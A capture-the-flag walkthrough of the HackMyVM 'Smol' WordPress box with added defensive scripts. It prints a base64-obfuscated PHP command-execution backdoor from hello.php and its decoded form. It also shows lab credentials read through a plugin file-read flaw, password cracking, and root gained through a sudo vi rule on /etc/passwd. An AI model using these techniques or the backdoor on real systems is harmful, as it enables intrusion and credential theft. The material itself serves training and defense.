hackmyvm-Smol

Information gathering

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:10       (Unknown: locally administered)
192.168.56.100  08:00:27:eb:ec:71       (Unknown)
192.168.56.110  08:00:27:6a:b5:9b       (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.200 seconds (116.36 hosts/sec). 3 responded
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV 192.168.56.110
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-03 03:20 EST
Nmap scan report for www.smol.hmv (192.168.56.110)
Host is up (0.0020s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: AnotherCTF
|_http-generator: WordPress 6.3
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:6A:B5:9B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds

Penetration

Visiting port 80 redirects to www.smol.hmv.

Configure the hosts file.

┌──(root㉿LAPTOP-40PQI58C)-[~]
└─# wpscan --url http://www.smol.hmv/ -e u,ap --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://www.smol.hmv/ [192.168.56.110]
[+] Started: Mon Mar  3 17:03:30 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://www.smol.hmv/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://www.smol.hmv/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://www.smol.hmv/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://www.smol.hmv/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.3 identified (Insecure, released on 2023-08-08).
 | Found By: Rss Generator (Passive Detection)
 |  - http://www.smol.hmv/index.php/feed/, <generator>https://wordpress.org/?v=6.3</generator>
 |  - http://www.smol.hmv/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.3</generator>

[+] WordPress theme in use: popularfx
 | Location: http://www.smol.hmv/wp-content/themes/popularfx/
 | Last Updated: 2024-11-19T00:00:00.000Z
 | Readme: http://www.smol.hmv/wp-content/themes/popularfx/readme.txt
 | [!] The version is out of date, the latest version is 1.2.6
 | Style URL: http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5
 | Style Name: PopularFX
 | Style URI: https://popularfx.com
 | Description: Lightweight theme to make beautiful websites with Pagelayer. Includes 100s of pre-made templates to ...
 | Author: Pagelayer
 | Author URI: https://pagelayer.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://www.smol.hmv/wp-content/themes/popularfx/style.css?ver=1.2.5, Match: 'Version: 1.2.5'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:01:14 <==================================> (109325 / 109325) 100.00% Time: 00:01:14
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://www.smol.hmv/wp-content/plugins/akismet/
 | Last Updated: 2025-02-14T18:49:00.000Z
 | Readme: http://www.smol.hmv/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.7
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/akismet/readme.txt

[+] jsmol2wp
 | Location: http://www.smol.hmv/wp-content/plugins/jsmol2wp/
 | Latest Version: 1.07 (up to date)
 | Last Updated: 2018-03-09T10:28:00.000Z
 | Readme: http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/jsmol2wp/, status: 200
 |
 | Version: 1.07 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://www.smol.hmv/wp-content/plugins/jsmol2wp/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] think
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://www.smol.hmv/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wp
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://www.smol.hmv/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] Jose Mario Llado Marti
 | Found By: Rss Generator (Passive Detection)

[+] wordpress user
 | Found By: Rss Generator (Passive Detection)

[+] admin
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://www.smol.hmv/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] diego
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gege
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] xavi
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Mar  3 17:04:55 2025
[+] Requests Done: 109398
[+] Cached Requests: 10
[+] Data Sent: 29.374 MB
[+] Data Received: 14.995 MB
[+] Memory used: 489.035 MB
[+] Elapsed time: 00:01:25

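From the wpscan results we can tell that

the WordPress site on the target has the jsmol2wp plugin installed.

Versions <= 1.07 of this plugin have a CVE.

The scan also found that the site has the users admin, wpuser, think, gege, diego and xavi.

I used the file read vulnerability to read wp-config.php and found a database username and password in it.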

/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

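The WordPress site also has a wpuser user,

so I tried logging in to WordPress with this password.

After logging in, I found that wpuser seems to be just an ordinary user,

without the plugin/theme source code editing feature I wanted.

I then briefly tested the file upload feature without any progress, after which I had no more ideas in this direction.

I turned my attention back to the jsmol2wp vulnerability.

I learned that this version of jsmol2wp also has an SSRF vulnerability,

so I tried using the Gopher protocol to attack the MySQL database and write a web shell to the site.

Unfortunately, I did not succeed.

Later I found some information in a post titled "Webmaster Tasks!!".

It says to check the Hello Dolly plugin for a backdoor.

┌──(root㉿kali)-[~kali/Desktop]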
└─# dirsearch -u "http://www.smol.hmv/" -w SecLists/Discovery/Web-Content/CMS/wp-plugins.fuzz.txt  
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 13370

Output File: /home/kali/Desktop/reports/http_www.smol.hmv/__25-03-03_04-29-49.txt

Target: http://www.smol.hmv/

[04:29:49] Starting:
[04:29:52] 200 -    0B  - /wp-content/plugins/akismet/                      
[04:30:15] 500 -    0B  - /wp-content/plugins/hello.php                     
[04:30:15] 500 -    0B  - /wp-content/plugins/hello.php/              

I fuzzed the site's directories once more

and found that hello.php exists.

I used the jsmol2wp vulnerability again

and read the source code of hello.php.

<?php
/**
 * @package Hello_Dolly
 * @version 1.7.2
 */
/*
Plugin Name: Hello Dolly
Plugin URI: http://wordpress.org/plugins/hello-dolly/
Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.7.2
Author URI: http://ma.tt/
*/

function hello_dolly_get_lyric() {
	/** These are the lyrics to Hello Dolly */
	$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, take her wrap, fellas
Dolly, never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
I feel the room swayin'
While the band's playin'
One of our old favorite songs from way back when
So, golly, gee, fellas
Have a little faith in me, fellas
Dolly, never go away
Promise, you'll never go away
Dolly'll never go away again";

	// Here we split it into lines.
	$lyrics = explode( "\n", $lyrics );

	// And then randomly choose a line.
	return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}

// This just echoes the chosen line, we'll position it later.
function hello_dolly() {
	eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
	$chosen = hello_dolly_get_lyric();
	$lang   = '';
	if ( 'en_' !== substr( get_user_locale(), 0, 3 ) ) {
		$lang = ' lang="en"';
	}
	printf(
		'<p id="dolly"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>',
		__( 'Quote from Hello Dolly song, by Jerry Herman:' ),
		$lang,
		$chosen
	);
}

// Now we set that function up to execute when the admin_notices action is called.
add_action( 'admin_notices', 'hello_dolly' );

// We need some CSS to position the paragraph.
function dolly_css() {
	echo "
	<style type='text/css'>
	#dolly { float: right; padding: 5px 10px; margin: 0; font-size: 12px; line-height: 1.6666; }
	.rtl #dolly { float: left; }
	.block-editor-page #dolly { display: none; }
	@media screen and (max-width: 782px) {
		#dolly, .rtl #dolly { float: none; padding-left: 0; padding-right: 0; }
	}
	</style>
	";
}

add_action( 'admin_head', 'dolly_css' );

There is a backdoor in the hello_dolly() function:

eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));

After base64 decoding, it is

if (isset($_GET["cmd"])) { system($_GET["cmd"]); }

But its trigger condition is add_action( 'admin_notices', 'hello_dolly' );

This function runs whenever admin_notices is triggered.

When we enter the admin dashboard as wpuser, there happens to be an admin_notices.
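A defender can find this kind of implant by scanning plugin files for `eval(base64_decode(...))`, decoding the argument, and resolving the octal/hex escapes that hide the parameter name. The following is an added example, not code from the original post; the function names and the second, harmless `base64_decode` line in the sample are constructed for illustration.

```python
import base64
import binascii
import re

# eval(base64_decode('<literal>')): the wrapper seen in the hello.php listing above.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)
# PHP double-quoted string escapes: \xHH (hex) and \NNN (octal).
PHP_ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))")
# Functions that run commands or code, and request-controlled inputs.
SINK = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(")
SOURCE = re.compile(r"""\$_(GET|POST|REQUEST|COOKIE)\s*\[\s*["']([^"']*)["']\s*\]""")


def unescape_php(text):
    """Resolve hex and octal escapes so obfuscated array keys become readable.

    Simplification: applied to the whole payload, not only to double-quoted strings.
    """
    def repl(match):
        if match.group(1) is not None:
            return chr(int(match.group(1), 16))
        return chr(int(match.group(2), 8) & 0xFF)
    return PHP_ESCAPE.sub(repl, text)


def scan_php(source):
    """Return one finding per eval(base64_decode(...)) call found in `source`."""
    findings = []
    for match in EVAL_B64.finditer(source):
        try:
            raw = base64.b64decode(match.group(2))
        except (binascii.Error, ValueError):
            continue  # not valid base64, leave it to manual review
        payload = unescape_php(raw.decode("utf-8", "replace")).strip()
        findings.append({
            "line": source.count("\n", 0, match.start()) + 1,
            "payload": payload,
            "sinks": sorted(set(SINK.findall(payload))),    # command/code execution calls
            "params": sorted(set(SOURCE.findall(payload))),  # (superglobal, key) pairs
        })
    return findings


# The backdoored call from the listing above (lyrics and markup omitted), plus a
# constructed, harmless base64_decode() use that must not be reported.
SAMPLE = """<?php
function hello_dolly() {
    eval(base64_decode('CiBpZiAoaXNzZXQoJF9HRVRbIlwxNDNcMTU1XHg2NCJdKSkgeyBzeXN0ZW0oJF9HRVRbIlwxNDNceDZkXDE0NCJdKTsgfSA='));
    $chosen = hello_dolly_get_lyric();
}
echo base64_decode('SGVsbG8sIERvbGx5');
"""

if __name__ == "__main__":
    for finding in scan_php(SAMPLE):
        print(finding)
```

A finding whose decoded payload contains both a sink and a request parameter is a remote command execution implant and should be treated as a compromise of the site, not only of the plugin file.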

Try executing a command on this page.

It executed successfully.

Then I uploaded a shell.php file to get a reverse shell,

and a sql.php to query all the usernames and passwords from the database.

┌──(root㉿LAPTOP-40PQI58C)-[~/Desktop]
└─# john passwd --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sandiegocalifornia (?)
hero_gege@hotmail.com (?)
2g 0:00:19:33 DONE (2025-03-02 21:39) 0.001704g/s 12226p/s 56527c/s 56527C/s !!!@@@!!!..*7?Vamos!
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.

This cracked the passwords of diego and gege.

This password is also diego's ssh password.

www-data@smol:/var/www/wordpress/wp-admin$ whoami
whoami
www-data
www-data@smol:/var/www/wordpress/wp-admin$ su diego
su diego
Password: sandiegocalifornia
whoami
diego

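The user's flag is in diego's home directory.

I tried logging in over ssh with the password,

but the four users diego, gege, think and xavi

are all prohibited from logging in remotely with a password.

I wrote an ssh public key into diego's home directory and then successfully logged in over ssh.

┌──(kali㉿kali)-[~]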
└─$ ssh diego@192.168.56.110 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 03 Mar 2025 05:48:15 PM UTC

  System load:  0.01              Processes:                194
  Usage of /:   57.2% of 9.75GB   Users logged in:          0
  Memory usage: 32%               IPv4 address for enp0s17: 192.168.56.110
  Swap usage:   0%

Expanded Security Maintenance for Applications is not enabled.

162 updates can be applied immediately.
125 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Mar  2 21:58:36 2025 from 192.168.56.103
diego@smol:~$ whoami
diego
diego@smol:~$ 

The four users diego, gege, think and xavi are all in one group and can access each other's home directories.

diego@smol:/home$ ls -al
total 24
drwxr-xr-x  6 root  root     4096 Aug 16  2023 .
drwxr-xr-x 18 root  root     4096 Mar 29  2024 ..
drwxr-x---  4 diego internal 4096 Mar  2 22:19 diego
drwxr-x---  7 gege  internal 4096 Mar  2 22:45 gege
drwxr-x---  5 think internal 4096 Jan 12  2024 think
drwxr-x---  2 xavi  internal 4096 Aug 18  2023 xavi
diego@smol:/home$ 

The think user's home directory contains a .ssh directory.

diego@smol:/home/think$ ls -al
total 32
drwxr-x--- 5 think internal 4096 Jan 12  2024 .
drwxr-xr-x 6 root  root     4096 Aug 16  2023 ..
lrwxrwxrwx 1 root  root        9 Jun 21  2023 .bash_history -> /dev/null
-rw-r--r-- 1 think think     220 Jun  2  2023 .bash_logout
-rw-r--r-- 1 think think    3771 Jun  2  2023 .bashrc
drwx------ 2 think think    4096 Jan 12  2024 .cache
drwx------ 3 think think    4096 Aug 18  2023 .gnupg
-rw-r--r-- 1 think think     807 Jun  2  2023 .profile
drwxr-xr-x 2 think think    4096 Jun 21  2023 .ssh
lrwxrwxrwx 1 root  root        9 Aug 18  2023 .viminfo -> /dev/null
diego@smol:/home/think$ ls -al .ssh/
total 20
drwxr-xr-x 2 think think    4096 Jun 21  2023 .
drwxr-x--- 5 think internal 4096 Jan 12  2024 ..
-rwxr-xr-x 1 think think     572 Jun 21  2023 authorized_keys
-rwxr-xr-x 1 think think    2602 Jun 21  2023 id_rsa
-rwxr-xr-x 1 think think     572 Jun 21  2023 id_rsa.pub
diego@smol:/home/think$ 

The diego user has r permission on it.

So I read the think user's private key

and then logged in remotely as think over ssh.

┌──(root㉿kali)-[/home/kali]
└─# ssh -i id_rsa think@192.168.56.110
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-156-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 03 Mar 2025 05:52:14 PM UTC

  System load:  0.02              Processes:                203
  Usage of /:   57.2% of 9.75GB   Users logged in:          1
  Memory usage: 33%               IPv4 address for enp0s17: 192.168.56.110
  Swap usage:   0%

Expanded Security Maintenance for Applications is not enabled.

162 updates can be applied immediately.
125 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Mar  3 15:54:04 2025 from 192.168.56.103
think@smol:~$ 
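Why diego could read the key follows from walking the permission bits along the whole path, which is also how an administrator can audit it. The following is an added example, not part of the original post; the path entries are transcribed from the `ls -al` listings above, while the account group memberships (each user's primary group named after the user, plus `internal`) and the hardened modes are assumptions.

```python
# Transcribed from the `ls -al` listings above: (path, mode string, owner, group).
EXPOSED = [
    ("/home",                   "drwxr-xr-x", "root",  "root"),
    ("/home/think",             "drwxr-x---", "think", "internal"),
    ("/home/think/.ssh",        "drwxr-xr-x", "think", "think"),
    ("/home/think/.ssh/id_rsa", "-rwxr-xr-x", "think", "think"),
]
# Assumed fix: .ssh restricted to 700 and the private key to 600.
HARDENED = EXPOSED[:2] + [
    ("/home/think/.ssh",        "drwx------", "think", "think"),
    ("/home/think/.ssh/id_rsa", "-rw-------", "think", "think"),
]
# Assumed group memberships; the page only states that the four users share one group.
ACCOUNTS = {
    "think": {"think", "internal"},
    "diego": {"diego", "internal"},
    "gege": {"gege", "internal"},
    "xavi": {"xavi", "internal"},
    "www-data": {"www-data"},
}


def triplet(mode, owner, group, user, groups):
    """Pick the rwx triplet that applies: owner first, then group, then other."""
    if user == owner:
        return mode[1:4]
    if group in groups:
        return mode[4:7]
    return mode[7:10]


def blocked_at(chain, user, groups):
    """Return the first path that denies `user`, or None if the final file is readable.

    Root's permission bypass and ACLs are not modelled.
    """
    *dirs, target = chain
    for path, mode, owner, group in dirs:
        # Traversing a directory needs the search (x) bit; s/t imply x is set.
        if triplet(mode, owner, group, user, groups)[2] not in "xst":
            return path
    path, mode, owner, group = target
    if triplet(mode, owner, group, user, groups)[0] != "r":
        return path
    return None


def who_can_read(chain, accounts):
    """List the accounts for which every directory is searchable and the file readable."""
    return sorted(u for u, g in accounts.items() if blocked_at(chain, u, g) is None)


if __name__ == "__main__":
    print("exposed :", who_can_read(EXPOSED, ACCOUNTS))
    print("hardened:", who_can_read(HARDENED, ACCOUNTS))
    print("www-data stops at:", blocked_at(EXPOSED, "www-data", ACCOUNTS["www-data"]))
```

The group-searchable home directory only matters because `.ssh` and `id_rsa` are readable by "other"; tightening either the directory or the key file breaks the chain.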

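The login succeeded, but think has to enter a password when running sudo -l,

and I don't know think's password.

When I had run out of ideas, I happened to run su gege as think

and found that I switched to the gege user without having to enter a password.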

think@smol:~$ su gege
gege@smol:/home/think$ whoami
gege
gege@smol:/home/think$ 

The gege user's home directory contains a wordpress.old.zip file,

but extracting it requires a password.

gege@smol:~$ ls
wordpress.old.zip
gege@smol:~$ ls
wordpress.old.zip
gege@smol:~$ unzip wordpress.old.zip 
Archive:  wordpress.old.zip
   creating: wordpress.old/
[wordpress.old.zip] wordpress.old/wp-config.php password: 

I copied it to my Kali machine and cracked it with john.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# john wordpress  --show
wordpress.old.zip:hero_gege@hotmail.com::wordpress.old.zip:wordpress.old/wp-content/plugins/akismet/index.php, wordpress.old/wp-content/index.php, wordpress.old/wp-content/plugins/index.php, wordpress.old/wp-content/themes/index.php, wordpress.old/wp-includes/blocks/spacer/style.min.css, wordpress.old/wp-includes/blocks/spacer/style-rtl.min.css, wordpress.old/wp-includes/blocks/spacer/style.css, wordpress.old/wp-includes/blocks/spacer/style-rtl.css:wordpress.old.zip

1 password hash cracked, 0 left

After extracting it,

I found xavi's password in its wp-config file.

Privilege escalation

After switching to the xavi user with su, run sudo -l.

gege@smol:~/wordpress.old$ su xavi
Password: 
xavi@smol:/home/gege/wordpress.old$ whoami
xavi
xavi@smol:/home/gege/wordpress.old$ sudo -l
[sudo] password for xavi: 
Matching Defaults entries for xavi on smol:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User xavi may run the following commands on smol:
    (ALL : ALL) /usr/bin/vi /etc/passwd
xavi@smol:/home/gege/wordpress.old$ 

/etc/passwd can be edited.

Run openssl passwd -1 -salt Yliken 123456 to generate a hash,

then write it into passwd.

Then su Yliken

xavi@smol:/home/gege/wordpress.old$ su Yliken
Password: 
root@smol:/home/gege/wordpress.old$ whoami
root
root@smol:/home/gege/wordpress.old$ id
uid=0(root) gid=0(root) groups=0(root)
root@smol:/home/gege/wordpress.old$ 
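The edit described above leaves two artifacts in /etc/passwd that an integrity check can catch: a second account with UID 0 and a password hash stored in the file itself instead of the `x` placeholder. The following is an added example, not part of the original post; the sample file, its UIDs and the hash value are constructed placeholders, and the function name is hypothetical.

```python
# crypt(3) hash prefixes; `openssl passwd -1` produces the "$1$" (MD5-based) form.
SCHEMES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt",
    "$2b$": "bcrypt",
    "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}
# Values of the password field that mean "no hash stored here".
PLACEHOLDERS = ("x", "*", "!")


def audit_passwd(text):
    """Return (line number, account, issue) tuples for suspicious passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        # Any UID 0 account is root-equivalent, whatever its name.
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((lineno, name, "UID 0 account other than root"))
        if password == "":
            findings.append((lineno, name, "empty password field"))
        elif password not in PLACEHOLDERS:
            # A hash here is honoured by login tools and bypasses /etc/shadow.
            scheme = next(
                (label for prefix, label in SCHEMES.items() if password.startswith(prefix)),
                "unknown scheme",
            )
            findings.append((lineno, name, f"password hash in /etc/passwd ({scheme})"))
    return findings


# Constructed sample: the last line mimics the entry added in the write-up,
# with a placeholder in place of the real hash (which the page does not show).
SAMPLE = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
xavi:x:1001:1001::/home/xavi:/bin/bash
Yliken:$1$Yliken$CONSTRUCTED.PLACEHOLDER.HASH:0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE):
        print(finding)
```

The root cause is the sudoers rule itself: granting an interactive editor on /etc/passwd is equivalent to granting root, so the rule should be removed rather than only monitored.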
